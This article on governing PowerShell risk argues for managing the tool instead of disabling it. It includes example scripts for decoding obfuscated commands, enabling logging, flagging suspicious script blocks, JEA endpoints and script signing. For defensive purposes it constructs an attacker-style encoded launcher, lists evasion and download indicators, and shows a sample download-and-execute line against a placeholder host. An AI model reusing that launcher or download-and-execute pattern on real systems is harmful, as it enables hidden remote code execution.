PowerShell and GRC: Moving from “Disable It” to “Manage It”
For years, many security conversations have started with the idea that hackers use PowerShell so it should be disabled. In reality, PowerShell is an essential operations tool. The real task is to manage risk so that organizations can use PowerShell safely while preserving the automation and efficiency that teams depend on.
The Myth: “Hackers Use PowerShell, Disable It”
It is true that attackers abuse PowerShell. Disabling it entirely harms operational capability and often encourages workarounds that are even riskier. It is also less effective than it looks: blocking powershell.exe does not remove the engine, because System.Management.Automation.dll can still be loaded by any .NET host. Mature organizations balance risks with benefits instead of paying the full operational cost for a partial control.
How Adversaries Hide: Understanding Obfuscation
Attackers commonly hide intent behind layers of encoding and obfuscation: Base64 passed to -EncodedCommand, hex-encoded strings, string concatenation and compression. By decoding these layers step by step, you usually uncover a short and very ordinary command, often a download-and-execute, concealed behind the encoded data. Script Block Logging records the de-obfuscated script text at execution time, which is why it is the single most useful log source for this problem.
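The step-by-step decoding described above, as an added example written for this page (not code from the original article). The command line is constructed here and only writes a string once decoded; in practice the sample would come from a process-creation event or EDR telemetry.

```powershell
# Added example (not from the original page): peel layered encoding off a
# constructed PowerShell one-liner of the kind seen in process command lines.
# The payload is synthetic and does nothing but write a string when decoded.

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    # -EncodedCommand is Base64 over UTF-16LE text, so decode with Unicode, not UTF-8.
    [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

function ConvertFrom-HexString {
    param([Parameter(Mandatory)][string]$Hex)
    # Accept "0x57,0x72" or "5772" style hex and return the ASCII text it encodes.
    $clean = ($Hex -replace '0x', '') -replace '[^0-9A-Fa-f]', ''
    $bytes = for ($i = 0; $i -lt $clean.Length; $i += 2) {
        [Convert]::ToByte($clean.Substring($i, 2), 16)
    }
    [System.Text.Encoding]::ASCII.GetString([byte[]]$bytes)
}

# Build the constructed sample the way an attacker would: hex-encode the real
# command, wrap it in a decode-and-execute stub, then Base64 the whole stub.
$inner   = "Write-Output 'decoded payload'"
$hex     = ($inner.ToCharArray() | ForEach-Object { '{0:X2}' -f [int]$_ }) -join ''
$stage1  = "`$h='$hex';`$b=0..(`$h.Length/2-1)|%{[Convert]::ToByte(`$h.Substring(`$_*2,2),16)};iex([Text.Encoding]::ASCII.GetString(`$b))"
$cmdline = 'powershell.exe -nop -w hidden -enc ' +
    [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($stage1))
"Observed command line: $cmdline"

# Step 1: strip the launcher flags and decode the Base64 layer.
$b64    = ($cmdline -split '-enc ')[-1]
$layer1 = ConvertFrom-EncodedCommand $b64
"Layer 1 (Base64 removed): $layer1"

# Step 2: pull the hex blob out of the stub and decode it statically. Never run
# the stub itself; the point of decoding is to see what it would do without
# letting it do it.
$hexBlob = [regex]::Match($layer1, "'([0-9A-Fa-f]+)'").Groups[1].Value
$layer2  = ConvertFrom-HexString $hexBlob
"Layer 2 (hex removed):    $layer2"
```

Each layer is decoded with a plain conversion rather than by executing the sample, and the only interpreter call (iex) is the attacker's, left inside the decoded text for the analyst to read. Real samples frequently add a third layer (Deflate or Gzip through a MemoryStream), which the same approach handles by decompressing the bytes before the next decode.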
What Risk Really Means and How GRC Helps
Risk is a combination of probability and impact. GRC exists to ensure that organizations understand why a control is needed, what must be done, and what is actually happening.
Navigating Industry Frameworks Without Creating New Ones
Organizations operate within frameworks like ISO, COSO, FAIR, NIST, ITIL and COBIT. The goal is not to invent new standards but to apply existing ones consistently.
Is PowerShell Really the Issue?
MITRE ATT&CK catalogues PowerShell abuse under several techniques, for example T1059.001 (Command and Scripting Interpreter: PowerShell) and T1546.013 (Event Triggered Execution: PowerShell Profile). Neither describes a flaw in PowerShell itself; both describe what an adversary does once they can already execute code on a host. That is why the controls that matter are about visibility and about who may run what, not about the interpreter.
Practical Risk Mitigations for PowerShell
- Observability through logging (Script Block, Module and Transcription logging) and EDR
- Access governance with admin tiering and Just Enough Administration (JEA)
- Script signing and application control (AppLocker or WDAC, the successors to Software Restriction Policies)
- Inbound and outbound access control, including which hosts may accept WinRM connections
- Secret management and AppSec testing for the scripts themselves
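The observability item above, worked through as an added example (not code from the original article): enable the PowerShell logging that defeats obfuscation, then triage script blocks with a small indicator list. The registry paths are the standard policy keys behind the Script Block Logging, Module Logging and Transcription group policy settings; the indicator list, sample script blocks and the transcript directory are constructed for this example.

```powershell
# Added example (not from the original page): turn on PowerShell logging via the
# policy registry keys, then score script blocks against constructed indicators.

function Enable-PowerShellLogging {
    # Run as Administrator. Script Block Logging writes de-obfuscated script text
    # to event 4104, Module Logging writes pipeline detail to 4103, and
    # Transcription writes full session transcripts to the output directory.
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    New-Item -Path "$base\ScriptBlockLogging" -Force | Out-Null
    Set-ItemProperty -Path "$base\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord
    New-Item -Path "$base\ModuleLogging\ModuleNames" -Force | Out-Null
    Set-ItemProperty -Path "$base\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
    Set-ItemProperty -Path "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*'
    New-Item -Path "$base\Transcription" -Force | Out-Null
    Set-ItemProperty -Path "$base\Transcription" -Name EnableTranscripting -Value 1 -Type DWord
    Set-ItemProperty -Path "$base\Transcription" -Name OutputDirectory -Value 'C:\PSTranscripts'  # assumed path
}

# Indicators are constructed for this example; tune them to your environment.
$Indicators = @(
    'FromBase64String', '-EncodedCommand', '-enc ', 'Invoke-Expression', 'iex',
    'DownloadString', 'Net.WebClient', 'Invoke-WebRequest', 'Add-MpPreference',
    '-nop', '-w hidden', 'Reflection.Assembly', 'VirtualAlloc'
)

function Test-ScriptBlock {
    param([Parameter(Mandatory)][string]$Text)
    # Return the matching indicators so an analyst can see why a block was flagged.
    $hits = @($Indicators | Where-Object { $Text -match [regex]::Escape($_) })
    [pscustomobject]@{
        Suspicious = ($hits.Count -ge 2)   # a lone 'iex' in admin tooling is common noise
        Hits       = $hits
        Preview    = $Text.Substring(0, [Math]::Min(80, $Text.Length))
    }
}

# Constructed sample script blocks standing in for the ScriptBlockText of 4104 events.
# 'SQBFAFgA' is the Base64 of the UTF-16LE string 'IEX'.
$samples = @(
    "Get-Service | Where-Object Status -eq 'Running'",
    "powershell -nop -w hidden -enc SQBFAFgA",
    "`$c=New-Object Net.WebClient;iex(`$c.DownloadString('http://example.invalid/a'))"
)
$samples | ForEach-Object { Test-ScriptBlock $_ } | Format-Table -AutoSize

# Live version on a host where logging is enabled: Properties[2] of a 4104 event
# is the ScriptBlockText field.
# Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104} -MaxEvents 500 |
#     ForEach-Object { Test-ScriptBlock $_.Properties[2].Value } |
#     Where-Object Suspicious
```

Keyword scoring is deliberately simple; its value is that it runs over the decoded text that Script Block Logging provides, so obfuscation at the command line does not hide the indicators. Forward the 4103/4104 events to the SIEM or EDR rather than relying on local event logs, which an attacker with admin rights can clear.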
Where to Begin: High Value Controls
Start with logging, EDR and remoting hygiene: enable Script Block, Module and Transcription logging, forward the events, and constrain who can reach WinRM and what they can run once connected. Move next to script signing, admin tiering and application control.
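Remoting hygiene and the JEA item from the mitigation list, as an added example (not code from the original article): a constrained endpoint that lets a helpdesk group view services and restart one of them without local administrator rights. The group name CONTOSO\Helpdesk, the endpoint and module names, the Spooler service and the transcript directory are assumptions for this example.

```powershell
# Added example (not from the original page): register a JEA endpoint with an
# allow-list role. Run as Administrator on the host that will accept the sessions.

$ModulePath = Join-Path $env:ProgramFiles 'WindowsPowerShell\Modules\HelpdeskJEA'   # assumed name
$RoleDir    = Join-Path $ModulePath 'RoleCapabilities'
New-Item -ItemType Directory -Path $RoleDir -Force | Out-Null
# Role capability files are discovered only inside a module, so create a minimal manifest.
New-ModuleManifest -Path (Join-Path $ModulePath 'HelpdeskJEA.psd1')

# Role capability: the allow-list of what the role can run. Everything else is
# invisible to the connected user, including the language itself.
New-PSRoleCapabilityFile -Path (Join-Path $RoleDir 'ServiceRestart.psrc') `
    -VisibleCmdlets @(
        'Get-Service',
        @{ Name = 'Restart-Service'; Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler' } }
    ) `
    -Description 'Helpdesk may list services and restart the print spooler only'

# Session configuration: RestrictedRemoteServer disables the interactive language,
# the virtual account means no standing admin credential is handed to the user,
# and transcripts record every command for audit.
$Pssc = Join-Path $env:TEMP 'Helpdesk.pssc'
New-PSSessionConfigurationFile -Path $Pssc `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory 'C:\JEATranscripts' `
    -RoleDefinitions @{ 'CONTOSO\Helpdesk' = @{ RoleCapabilities = 'ServiceRestart' } }

# Validate before registering; returns $true when the file parses and is consistent.
Test-PSSessionConfigurationFile -Path $Pssc
Register-PSSessionConfiguration -Name 'Helpdesk' -Path $Pssc -Force   # -Force restarts WinRM

# Verify from a client as a member of the group: only the allowed commands appear.
# Enter-PSSession -ComputerName <host> -ConfigurationName Helpdesk
# Get-Command   # Get-Service, Restart-Service plus the handful of default JEA commands
```

The ValidateSet on Restart-Service is the part that most often gets forgotten: exposing a cmdlet without constraining its parameters usually recreates the privilege you were trying to remove. Keep the role capability file under version control and review it like any other access control list.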
A Simple Three Phase Approach
Phase 1: Observe and contain. Turn on logging, forward it to EDR or the SIEM, and limit where remoting is allowed from and to.
Phase 2: Establish trust. Sign approved scripts, move administrators onto tiered accounts and JEA endpoints, and enforce application control.
Phase 3: Institutionalize controls. Map the controls to the framework the organization already uses, assign owners, and audit that they remain in place.
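The script-signing control from Phase 2 and the mitigation list, as an added example (not code from the original article): sign a script, verify the signature, and require signatures on the host. The script path and certificate subject are assumptions. The self-signed certificate is for a lab only; a production deployment issues code-signing certificates from an internal CA and publishes them to the Trusted Publishers store.

```powershell
# Added example (not from the original page): sign, verify and enforce.

$ScriptPath = Join-Path $env:TEMP 'Restart-Spooler.ps1'   # assumed path
Set-Content -Path $ScriptPath -Value 'Restart-Service -Name Spooler'

# Lab-only code-signing certificate. In production, request one from the
# internal CA instead and keep the private key off administrator workstations.
$Cert = New-SelfSignedCertificate -Type CodeSigningCert -Subject 'CN=Lab Script Signing' `
    -CertStoreLocation Cert:\CurrentUser\My

# Sign the file. Production signing should add -TimestampServer so signatures
# remain valid after the certificate expires; omitted here to keep the example offline.
Set-AuthenticodeSignature -FilePath $ScriptPath -Certificate $Cert | Out-Null

function Test-ScriptSignature {
    param([Parameter(Mandatory)][string]$Path)
    # Status is 'Valid' only when the hash matches AND the chain is trusted.
    # A self-signed cert that is not in Trusted Root / Trusted Publishers returns
    # 'UnknownError'; editing the file after signing returns 'HashMismatch';
    # an unsigned file returns 'NotSigned'.
    $sig = Get-AuthenticodeSignature -FilePath $Path
    [pscustomobject]@{
        Path   = $Path
        Status = $sig.Status
        Signer = $sig.SignerCertificate.Subject
    }
}
Test-ScriptSignature $ScriptPath

# Demonstrate tamper detection: any change after signing invalidates the hash.
Add-Content -Path $ScriptPath -Value '# post-signing edit'
Test-ScriptSignature $ScriptPath    # Status is now HashMismatch

# Enforce: unsigned or tampered scripts no longer run in this scope.
# Execution policy is a guardrail for operators, not a security boundary;
# pair it with AppLocker or WDAC rules that only trust the same signing certificate.
Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope LocalMachine -Force
```

AllSigned also prompts on first use of a signer that is not yet in Trusted Publishers, which is the moment to confirm the certificate is the organization's own. Apply the execution policy through Group Policy rather than per host so that a local change does not silently undo the control.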
The Australian Signals Directorate (ASD) guidance on securing PowerShell in the enterprise is a great starting point for applying these concepts; it covers the same logging, constrained-language and application-control measures discussed here.
Conclusion
PowerShell is not inherently unsafe. The absence of proper governance is what creates risk. Managing PowerShell through GRC principles allows organizations to keep automation advantages while reducing attack surface.